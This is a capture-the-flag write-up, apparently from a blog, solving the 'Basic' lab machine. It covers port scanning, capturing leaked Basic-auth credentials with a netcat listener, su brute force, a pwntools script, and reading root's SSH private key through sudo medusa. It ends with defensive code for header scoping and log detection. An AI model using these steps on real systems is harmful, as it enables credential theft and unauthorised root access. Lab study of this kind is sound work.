Basic

Target Machine Description

QQ group: 660930334

I. Host Discovery

┌──(root㉿kali)-[/miao/maze-sec/basic]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-08 09:01 CST
Nmap scan report for 192.168.2.1
Host is up (0.0012s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.0020s latency).
MAC Address: 08:00:27:F5:57:69 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.48
Host is up (0.0010s latency).
MAC Address: 08:00:27:3C:D4:7D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.22 seconds

IP address: 192.168.2.48

II. Port Scanning

1. Full port scan

┌──(root㉿kali)-[/miao/maze-sec/basic]
└─# nmap --min-rate 10000 -p- 192.168.2.48
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-08 09:02 CST
Nmap scan report for 192.168.2.48
Host is up (0.00033s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:3C:D4:7D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.69 seconds

Open ports: 22, 80

2. Detailed service scan

┌──(root㉿kali)-[/miao/maze-sec/basic]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.48
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-08 09:03 CST
Nmap scan report for 192.168.2.48
Host is up (0.0011s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: HTTP Requester
MAC Address: 08:00:27:3C:D4:7D (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.77 seconds

3. UDP port scan

┌──(root㉿kali)-[/miao/maze-sec/basic]
└─# nmap -sU --top-ports 100 192.168.2.48
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-08 09:04 CST
Nmap scan report for 192.168.2.48
Host is up (0.0020s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:3C:D4:7D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 111.76 seconds

III. Web Penetration

Visiting port 80 shows a Website Request Tool:

┌──(root㉿kali)-[/miao/maze-sec/basic]
└─# curl http://192.168.2.48
<!DOCTYPE html>
<html>
<head>
<title>HTTP Requester</title>
<style>
body {
font-family: Arial, sans-serif;
max-width: 800px;
margin: 0 auto;
padding: 20px;
background-color: #f5f5f5;
}
.container {
background-color: white;
padding: 20px;
border-radius: 8px;
box-shadow: 0 2px 10px rgba(0,0,0,0.1);
}
h1 {
color: #333;
border-bottom: 2px solid #eee;
padding-bottom: 10px;
}
form {
margin: 20px 0;
display: flex;
gap: 10px;
}
input[type="text"] {
flex: 1;
padding: 10px;
border: 1px solid #ddd;
border-radius: 4px;
}
button {
padding: 10px 20px;
background-color: #4CAF50;
color: white;
border: none;
border-radius: 4px;
cursor: pointer;
}
button:hover {
background-color: #45a049;
}
.result-box {
margin-top: 20px;
padding: 15px;
background-color: #f9f9f9;
border-left: 4px solid #ccc;
}
nav {
margin-top: 30px;
display: flex;
gap: 15px;
}
nav a {
padding: 8px 16px;
background-color: #e0e0e0;
border-radius: 4px;
text-decoration: none;
color: #333;
}
nav a:hover {
background-color: #d0d0d0;
}
pre {
max-height: 300px;
overflow: auto;
padding: 15px;
background-color: #f8f8f8;
border: 1px solid #e0e0e0;
border-radius: 4px;
white-space: pre-wrap;
}
</style>
</head>
<body>
<div class="container">
<h1>Website Request Tool</h1>
<form method="POST">
<input type="text" name="url" placeholder="Enter URL starting with http" required>
<button type="submit">Fetch Content</button>
</form>

<div class="result-box">
<h3>Current target:</h3>
No request made </div>

<div class="result-box">
<h3>Response:</h3>
<p>Submit URL to test connection</p>
</div>

<nav>
<a href="home.php">Home</a>
<a href="about.php">About</a>
<a href="dashboard.php">Dashboard</a>
</nav>
</div>
</body>
</html>

1. Directory scan

┌──(root㉿kali)-[/miao/maze-sec/basic]
└─# gobuster dir -u http://192.168.2.48 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.2.48
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,html,bak,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 277]
/.html (Status: 403) [Size: 277]
/about.php (Status: 200) [Size: 334]
/home.php (Status: 200) [Size: 334]
/index.php (Status: 200) [Size: 2675]
/dashboard.php (Status: 302) [Size: 0] [--> home.php]
/.php (Status: 403) [Size: 277]
/.html (Status: 403) [Size: 277]
/server-status (Status: 403) [Size: 277]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

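No useful directories were found.

2. Requesting other services

Start a service on Kali and submit its URL to the tool; the target does request it.

3. Token leak

Start a listener on Kali and have the target fetch it; the request the target sends carries an Authorization: Basic header: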

┌──(root㉿kali)-[/miao/maze-sec/basic]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.48] 57332
GET / HTTP/1.1
Host: 192.168.2.4:4444
Accept: */*
Authorization: Basic Y25oeWs6YmNmODI5NjI3ZWVhMzY0YTNhYmM0MWE2NTM3ZmJmNTQzZTk3NGZmOA==

Decode the Base64 value:

┌──(root㉿kali)-[/miao/maze-sec/basic]
└─# echo "Y25oeWs6YmNmODI5NjI3ZWVhMzY0YTNhYmM0MWE2NTM3ZmJmNTQzZTk3NGZmOA==" | base64 -d
cnhyk:bcf829627eea364a3abc41a6537fbf543e974ff8

4. Gaining user access

┌──(root㉿kali)-[/miao/maze-sec/basic]
└─# ssh cnhyk@192.168.2.48
cnhyk@192.168.2.48's password:
Linux Basic 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
cnhyk@Basic:~$ id
uid=1000(cnhyk) gid=1000(cnhyk) groups=1000(cnhyk)

USER FLAG

cnhyk@Basic:~$ cat user.txt 
flag{user-df31759540dc28f75a20f443a19b1148}

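IV. Privilege Escalation

1. Gaining access as jojo

Under /home there is a user named jojo.

Method 1: Brute force

Try brute-forcing the password of user jojo directly: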

cnhyk@Basic:/tmp$ ./suForce -u jojo -w pass.txt 
_____
___ _ _ | ___|__ _ __ ___ ___
/ __| | | || |_ / _ \| '__/ __/ _ \
\__ \ |_| || _| (_) | | | (_| __/
|___/\__,_||_| \___/|_| \___\___|
───────────────────────────────────
code: d4t4s3c version: v1.0.0
───────────────────────────────────
🎯 Username | jojo
📖 Wordlist | pass.txt
🔎 Status | 2814/10000/28%/jojo
💥 Password | jojo
───────────────────────────────────

Password found: jojo

Method 2: /opt

In /opt there is an executable named jojo; try running it:

cnhyk@Basic:/opt$ ./jojo
问题 1: 请输入 67+30
107
错误!
问题 2: 请输入 64+74
64+74
正确!
问题 3: 请输入 80+11
80+11
正确!
问题 4: 请输入 76+61

Upload socat and expose the binary on a port:

cnhyk@Basic:/tmp$ ./socat TCP-LISTEN:6666,reuseaddr,fork EXEC:/opt/jojo,pty,stderr,setsid

Then write a script to drive it:

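from pwn import *
import re

# Connect to the socat listener that wraps /opt/jojo
r = remote("192.168.2.48", 6666)

while True:
    try:
        data = r.recv(timeout=2).decode(errors='ignore')
        print(data, end='')

        # The binary accepts the expression text itself as the answer,
        # so pull it out of the prompt and send it back unchanged
        match = re.search(r"请输入\s*([\d+\-*/\s]+)", data)
        if match:
            expr = match.group(1).strip()
            r.sendline(expr.encode())
    except EOFError:
        print("[*] Connection closed.")
        break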

This reveals the password: jojo

┌──(root㉿kali)-[/miao/maze-sec/basic]
└─# ssh jojo@192.168.2.48
jojo@192.168.2.48's password:
Linux Basic 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jojo@Basic:~$ id
uid=1001(jojo) gid=1001(jojo) groups=1001(jojo)

2. Gaining root

Running sudo -l shows that jojo can run /usr/bin/medusa as root without a password:

jojo@Basic:~$ sudo -l
Matching Defaults entries for jojo on Basic:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jojo may run the following commands on Basic:
(ALL) NOPASSWD: /usr/bin/medusa

Check its usage:

jojo@Basic:~$ /usr/bin/medusa -h
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

/usr/bin/medusa: option requires an argument -- 'h'
CRITICAL: Unknown error processing command-line options.
ALERT: Host information must be supplied.

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
-h [TEXT] : Target hostname or IP address
-H [FILE] : File containing target hostnames or IP addresses
-u [TEXT] : Username to test
-U [FILE] : File containing usernames to test
-p [TEXT] : Password to test
-P [FILE] : File containing passwords to test
-C [FILE] : File containing combo entries. See README for more information.
-O [FILE] : File to append log information to
-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)
-M [TEXT] : Name of the module to execute (without the .mod extension)
-m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a
different parameter each time and they will all be sent to the module (i.e.
-m Param1 -m Param2, etc.)
-d : Dump all known modules
-n [NUM] : Use for non-default TCP port number
-s : Enable SSL
-g [NUM] : Give up after trying to connect for NUM seconds (default 3)
-r [NUM] : Sleep NUM seconds between retry attempts (default 3)
-R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
-c [NUM] : Time to wait in usec to verify socket is available (default 500 usec).
-t [NUM] : Total number of logins to be tested concurrently
-T [NUM] : Total number of hosts to be tested concurrently
-L : Parallelize logins using one username per thread. The default is to process
the entire username before proceeding.
-f : Stop scanning host after first valid username/password found.
-F : Stop audit after first valid username/password found on any host.
-b : Suppress startup banner
-q : Display module's usage information
-v [NUM] : Verbose level [0 - 6 (more)]
-w [NUM] : Error debug level [0 - 10 (more)]
-V : Display version
-Z [TEXT] : Resume scan based on map of previous scan

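Read root's private key. medusa treats every line of the file passed to -H as a hostname and, when resolution fails, prints that line in the error message: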

jojo@Basic:~$ sudo medusa -H /root/.ssh/id_rsa -u root -p root -M ssh
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

CRITICAL: Failed to resolve hostname: -----BEGIN OPENSSH PRIVATE KEY----- - Name or service not known
CRITICAL: Failed to resolve hostname: -----END OPENSSH PRIVATE KEY----- - Name or service not known

Clean up the output, keeping only the sixth whitespace-separated field of each line:

┌──(root㉿kali)-[/miao/maze-sec/basic]
└─# cat tmp | awk '{print $6}'
-----BEGIN
[...]
-----END

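After restoring the full BEGIN and END marker lines, which awk cut at the first space, this gives the complete private key: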

-----BEGIN OPENSSH PRIVATE KEY-----
[...]
-----END OPENSSH PRIVATE KEY-----

Gaining root access

┌──(root㉿kali)-[/miao/maze-sec/basic]
└─# ssh root@192.168.2.48 -i id_rsa
Linux Basic 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jul 6 08:23:47 2025 from 192.168.3.94
root@Basic:~# id
uid=0(root) gid=0(root) groups=0(root)

ROOT FLAG

root@Basic:~# cat root.txt 
flag{root-c065860911bb44a2483c096cbd203df9}

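[Summary]

1. Basic authentication

In HTTP, Basic access authentication is a login method that lets a web browser or other client supply credentials, in the form of a username and password, along with a request. The request carries a header of the form Authorization: Basic <credentials>, where credentials is the Base64 encoding of the username and password joined by a colon :. Base64 is an encoding, not encryption, so anyone who receives the header can recover the username and password.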
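
The leak in section III.3 happens because the request tool attaches its stored credentials to whatever URL is submitted. The following is an added example, not the target's code: the function names, `CREDENTIAL_ORIGIN` and the sample credentials in the comments are assumptions for illustration. It contrasts a header builder that always sends `Authorization: Basic` with one that sends it only to the single origin the credentials belong to.

```python
import base64
from urllib.parse import urlsplit

# Assumption: the one origin (scheme, host, port) the stored credentials belong to.
CREDENTIAL_ORIGIN = ("http", "internal-api.example", 80)
DEFAULT_PORTS = {"http": 80, "https": 443}


def basic_header(user, password):
    """Build the Basic credentials value: base64("user:password")."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def decode_basic(value):
    """Recover (user, password) from a header value; no key is needed."""
    scheme, _, token = value.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic credential")
    user, _, password = base64.b64decode(token).decode().partition(":")
    return user, password


def origin_of(url):
    """Return (scheme, host, port), or None if the URL is not plain http(s)."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in DEFAULT_PORTS or not parts.hostname:
        return None
    try:
        port = parts.port or DEFAULT_PORTS[scheme]
    except ValueError:  # non-numeric or out-of-range port
        return None
    return scheme, parts.hostname.lower(), port


def headers_vulnerable(url, user, password):
    # Behaviour seen in the capture: credentials go to any submitted URL.
    return {"Accept": "*/*", "Authorization": basic_header(user, password)}


def headers_hardened(url, user, password):
    # Credentials are attached only when the parsed origin matches exactly,
    # e.g. headers_hardened(url, "svc-user", "constructed-secret").
    headers = {"Accept": "*/*"}
    if origin_of(url) == CREDENTIAL_ORIGIN:
        headers["Authorization"] = basic_header(user, password)
    return headers
```

The same origin check has to run again on every redirect hop, otherwise an allowed first URL can forward the header elsewhere.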

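2. Privilege escalation with medusa

medusa can read file contents: run through sudo, it prints each line of the file given to -H in its hostname-resolution errors.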
sudo medusa -H /root/.ssh/id_rsa -u root -p root -M ssh
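
A detection for the sudo misuse above, as an added example that is not part of the original write-up: it scans sudo log lines for medusa runs as root whose file-taking options (taken from the usage text shown earlier) point into sensitive directories. The log lines are constructed, and `SENSITIVE_DIRS` and the function names are assumptions.

```python
import posixpath
import re

# Options the Medusa usage text above documents as taking a FILE argument.
FILE_FLAGS = {"-H", "-U", "-P", "-C", "-O"}
# Assumption: trees an unprivileged user should never feed to a root process.
SENSITIVE_DIRS = ("/root", "/etc")
# sudo's syslog layout: "sudo: user : TTY=.. ; PWD=.. ; USER=.. ; COMMAND=.."
SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+) : .*?PWD=(?P<pwd>\S+) ; "
                     r"USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.+)$")

# Constructed sample log lines, not taken from the target.
SAMPLE_LOG = [
    "Jul  8 09:40:01 Basic sudo:     jojo : TTY=pts/0 ; PWD=/home/jojo ; USER=root ; "
    "COMMAND=/usr/bin/medusa -H /root/.ssh/id_rsa -u root -p root -M ssh",
    "Jul  8 09:41:10 Basic sudo:     jojo : TTY=pts/0 ; PWD=/tmp ; USER=root ; "
    "COMMAND=/usr/bin/medusa -H../root/.ssh/id_rsa -u root -p root -M ssh",
    "Jul  8 09:42:30 Basic sudo:     jojo : TTY=pts/0 ; PWD=/home/jojo ; USER=root ; "
    "COMMAND=/usr/bin/medusa -h 192.168.2.48 -U users.txt -P pass.txt -M ssh",
]

def medusa_file_args(command):
    """Return [(flag, path)] for each file-taking option of a medusa command."""
    argv = command.split()  # sudo logs the argv joined by spaces
    if not argv or posixpath.basename(argv[0]) != "medusa":
        return []
    found = []
    for i, arg in enumerate(argv):
        if arg[:2] in FILE_FLAGS:
            # getopt accepts both "-H file" and "-Hfile".
            path = arg[2:] or (argv[i + 1] if i + 1 < len(argv) else "")
            if path:
                found.append((arg[:2], path))
    return found

def sensitive_target(path, cwd):
    """Resolve path against the logged PWD; return it if it is sensitive."""
    full = posixpath.normpath(posixpath.join(cwd, path))
    hit = any(full == d or full.startswith(d + "/") for d in SENSITIVE_DIRS)
    return full if hit else None

def alerts_for(log_lines):
    """Return (user, flag, resolved_path) for every root medusa run to flag."""
    alerts = []
    for line in log_lines:
        m = SUDO_RE.search(line)
        if not m or m["runas"] != "root":
            continue
        for flag, path in medusa_file_args(m["cmd"]):
            full = sensitive_target(path, m["pwd"])
            if full:
                alerts.append((m["user"], flag, full))
    return alerts
```

Log-based detection is a backstop and does not follow symlinks; the fix is to remove the NOPASSWD rule, because a root process that opens a caller-named file and echoes its lines discloses that file.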


Basic
http://miao-sec.github.io/Maze-sec/Basic/
Author: Miao
Published: July 9, 2025
License: BY-MIAO